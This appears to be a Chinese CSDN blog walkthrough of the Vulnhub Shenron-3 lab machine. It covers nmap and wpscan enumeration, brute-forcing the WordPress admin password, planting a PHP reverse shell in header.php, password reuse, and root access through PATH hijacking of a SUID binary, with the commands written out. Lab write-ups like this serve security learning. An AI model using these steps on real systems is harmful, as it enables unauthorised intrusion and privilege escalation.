Vulnhub-shenron-3:神龙3靶机渗透攻略

最新推荐文章于 2024-05-21 11:56:58 发布
最新推荐文章于 2024-05-21 11:56:58 发布
阅读量3.1k 收藏
点赞数
分类专栏: vulnhub靶机通关 文章标签: 安全 web安全 渗透测试 网络安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122863324
版权

下载链接:https://www.vulnhub.com/entry/shenron-3,682/
需要拿到两面flag

信息收集

nmap扫描

nmap -sC -sV 192.168.210.209
在这里插入图片描述

只有一个80端口

网站信息收集

看来得添加hosts解析,跟同系列靶机一个套路
在这里插入图片描述

在这里插入图片描述

页面正常
在这里插入图片描述

发现cms还是wordpress

目录扫描

dirb http://shenron
找到个后台登录页面
在这里插入图片描述

wordpress漏洞利用

wpscan扫描

wpscan --url http://shenron/ --enumerate u
在这里插入图片描述

发现用户名为admin

爆破后台密码

wpscan --url [http://shenron](http://shenron) --usernames admin --passwords tools/z字典/wordlist.txt
这里用了自己的字典 ,用/usr/share/wordlists/rockyou.txt 也可就是时间长一点
iloverockyou
在这里插入图片描述

登录后台
在这里插入图片描述

getshell

找到header.php,插入php反弹链接木马
在这里插入图片描述

kali使用nc监听端口,刷新页面成功getshell
在这里插入图片描述

python调一个交互bash
python3 -c 'import pty; pty.spawn("/bin/bash");'

提权

cat /etc/passwd
发现一个shenron用户
在这里插入图片描述

试了试刚才爆出的后台密码发现直接登录shenron
在这里插入图片描述

发现flag1
在这里插入图片描述

执行了network发现实际上执行的就是network,并且他有suid权限,所属者为root
在这里插入图片描述

修改环境变量

进入tmp下 创建一个netstat文件 写入/bin/bash,并赋予执行权限,那么只要执行了我们创建的netstat就可以调一个bash。
接下来赋予环境变量叫bash到当前tmp目录寻找命令,那么找到的netstat就会变成我们创建的netstat。又因为shenron家目录下的network有suid权限所属者是root,所以实际上会用root调bash。

echo /bin/bash > netstat
export PATH=/tmp:$PATH
echo $PATH
在这里插入图片描述

执行家目录下的network
在这里插入图片描述

root家目录下发现flag2,通关!
在这里插入图片描述

Forest深林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
game-in1-rawi-olavM
04-07
该游戏是基于鹿特丹Emmauscollege的4HV模板 我的游戏:游戏名称 由...制作: 奥拉夫v迈登 拉威·比达尔(Rawi Bidar) 我的计划 基本:说明,玩法,出发和得分 使用画布创建index.html,style.css和script.js 标志牌手 移动球员 在屏幕上放置点 分数点 说明画面 创建项目列表 列出敌人 确保当您单击这些物品/敌人时,它们会生成 添加重力/物理(稍后添加) 扩展:提出一些建议,例如更多的对手 背景/地面是背景为丘陵的草地,但您也可以选择石质区域 可能的敌人清单:老鼠,活火箭发射器,带职员的骨架,僵尸,飞机(不发动击但可以摧毁),飞剑,带有电击光环的猫,可对其造成伤害,冰箱具有激光击落,是的! 喊出, NPC的列表:BHead(重设世界),Shenron(如果您将7个特殊物品放在一起,他会给他一个愿望),Liqu
shenron3(密码复用,netstat提权)
m0_66299232的博客
10-17 387
6.把index.php源码改成php-reverse-shell.php(github里有),保存后,开启监听,访问页面,成功反弹shell。2.找了一通没找到可利用信息,而且我进不去shenron用户下,只能靠运气把唯一的密码输入进去试试。3.查看network命令的特征,是一个查tcp,udp的命令;4.我们新建一个netstat文件写入提权命令,让它替换network。成功进入shenron用户下,用find命令查到一个network。5.提权成功,进入root目录,成功拿下!
shenron-3 靶机wp
m0_52496313的博客
09-14 504
shenron-3 靶机wp
SHENRON-1(神龙靶机
m0_66299232的博客
09-29 634
就是为了让两个linux机器之间使用ssh不需要用户名和密码。常规我们ssh连接到其他服务器的时候是需要输入密码的,这个文件中可以实现你的免密登录连接,只需要两步操作:1、在要被连接的目标服务器上生成 ssh 公钥 xxx.pub2、将远程服务器上生成的 xxx.pub 中的内容,拷贝到当前服务器的 ~/.ssh/authorized_keys 中这样再进行 ssh 连接目标服务器的时候,就不会提示输入密码了,结果是直接连接成功生成公私钥(2)创建公私钥。
Vulnhub靶场之SHENRON: 3(wordpress)
weixin_42478365的博客
02-28 387
靶场
vulnhub--shenron: 3
venu_s的博客
08-12 390
靶机介绍 Goal: Get two flags Difficult: Beginner Download:https://www.vulnhub.com/entry/shenron-3,682/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.176 目录扫描 gobuster dir -u http://192.168.187.176 -x "php,txt,zip,b
DBS TCG Quick Search-crx插件
04-04
在CardMarket或TCGPlayer上搜索卡,即可快速访问Meta Decks,DBS Decks主页和Shenron的Lair DB。 将卡名称放在搜索栏上,然后按Enter键,您将被重定向到CardMarket(EU)或TCGPlayer(USA / CA / NZ / AU)。 按DBS ...
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 137
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
防静电劳保鞋:工业安全中的隐形守护者
YOUSUTO的博客
05-16 431
因此,防静电措施在工业安全中显得尤为重要。在众多防静电措施中,防静电劳保鞋作为工作人员脚下的隐形守护者,发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者,在防止静电危害方面发挥着重要作用。在工业生产中,我们应该充分认识到防静电措施的重要性,并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中,静电可能导致设备损坏、产品性能下降,甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品,能够在人员走动、操作设备时,有效消除人体静电积聚,减少静电带来的潜在风险。
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 654
作用就是定义属性之间的数学关系
Nginx - 安全基线配置与操作指南
小工匠
05-19 919
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
全面解析防静电措施:保障工业安全,预防静电危害
YOUSUTO的博客
05-16 361
静电是一种常见的物理现象,由于电荷的不平衡而产生。在特定的环境中,静电可能会带来危害,如损坏电子设备、引起火灾等。因此,采取适当的防静电措施是非常重要的。总之,防静电需要采取综合的措施,从环境、设备、人员等多个方面入手,才能有效地减少静电的危害。
如何选择一款安全高效的数据自动同步工具?
文件数据安全交换
05-21 173
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
深度学习之基于YoloV5的建筑场所安全检测系统
最新发布
2301_79810943的博客
05-21 256
一、项目背景与目标随着城市化进程的加速,建筑场所的安全问题日益受到关注。为了实现对建筑场所的全面、实时监控,并及时发现潜在的安全隐患,本项目旨在利用深度学习技术,开发一个基于YoloV5算法的建筑场所安全检测系统。二、技术选型与特点YoloV5算法:本项目采用YoloV5作为核心检测算法。YoloV5以其高精度、快速检测速度和强大的多尺度检测能力著称,非常适合用于复杂建筑场所的安全检测。
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 407
Web应用防火墙的重要性
[图解]SysML和EA建模住宅安全系统-06参数图
rolt的专栏
05-19 542
往上面加的就是约束块
Microsoft Dataverse中的安全概念
全网:架构师研究会
05-15 824
Dataverse的一个关键特性是其丰富的安全模型,可以适应许多业务使用场景。只有当环境中存在Dataverse数据库时,此安全模型才会发挥作用。作为管理员,您可能不会自己构建整个安全模型,但通常会参与管理用户、确保他们拥有正确的配置以及解决与安全访问相关的问题的过程。提示视频符号查看以下视频:Microsoft Dataverse – Security Concepts Shown In Dem...
4 软件定义安全综合:使用c/s模式进行控制器数据安全交互管理
qq_28938301的博客
05-15 334
本文将展示控制器与应用层如何通信编写的控制器为例子(packet_statics.py)结合mininet模块创建的网络拓扑(3_2_topo.py),然后在另外一个应用程序中开启数据收集(另外一个应用进程app_server.py),获取在SDN环境中每次通信的dpid和port,并传输给应用层(app_server.p)实际上就是解决:ryu控制器如何实现与应用层(如web、app等)的通信,利用SDN的北向接口的功能就是和其他软件实体之间的通信。
了解等保测评的中间件安全Tomcat,如何检查配置是否符合安全要求?
2403_84237550的博客
05-16 692
在等保测评中,Tomcat中间件的安全性是一个重要的评估内容。Tomcat是一个开源的应用服务器,广泛应用于Web应用程序的开发和部署。由于其易用性和灵活性,Tomcat成为了一个受欢迎的目标,被黑客击和滥用。因此,保证Tomcat中间件的安全性对于整个系统的安全至关重要。总之,在等保测评中深入了解Tomcat中间件安全需要综合考虑多个因素,包括Tomcat版本、安全参数、服务配置、防火墙、监控和日志记录等。
智能数据提取:在严格数据治理与安全标准下的实践路径
Shaidou_Data的博客
05-15 293
在享受智能数据提取带来的便利的同时,我们也不能忽视数据治理与安全的重要性。智能数据提取技术为企业带来了巨大的便利和价值,但也需要我们在享受这些便利的同时,加强数据治理与安全的管理。通过制定明确的数据治理策和规范、选择合适的智能数据提取工具、建立数据安全防护体系、实施数据质量监控与改进以及加强人员培训与管理等措施,我们可以在严格数据治理与安全标准下实现智能数据提取的可持续发展。在实施智能数据提取之前,企业需要制定明确的数据治理策和规范,包括数据质量标准、数据访问权限、数据审计与监控等方面的要求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值